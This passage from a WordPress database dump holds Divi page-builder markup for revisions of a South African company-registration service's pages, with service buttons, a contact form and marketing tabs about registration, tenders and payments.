_builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Gaming </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Event </h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Sports &amp; Fitness </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Real Estate </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>productivity </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Hospitality </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Education </h3>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Maintaining Your Company','','inherit','closed','closed','','32724-revision-v1','','','2019-08-16 09:51:25','2019-08-16 07:51:25','',32724,'https://companyregistration.online/32724-revision-v1/',0,'revision','',0),(32988,3,'2019-08-19 13:21:45','2019-08-19 11:21:45','[et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\"]<h1 style=\"text-align: center;\">What Would You Like To Do ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"|223px||427px||\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" background__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#ffffff\"][/et_pb_cta][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][/et_pb_cta][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][/et_pb_cta][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Combo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/combo-deals-2\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-19 13:21:45','2019-08-19 11:21:45','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32829,3,'2019-08-15 16:23:06','2019-08-15 14:23:06','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs 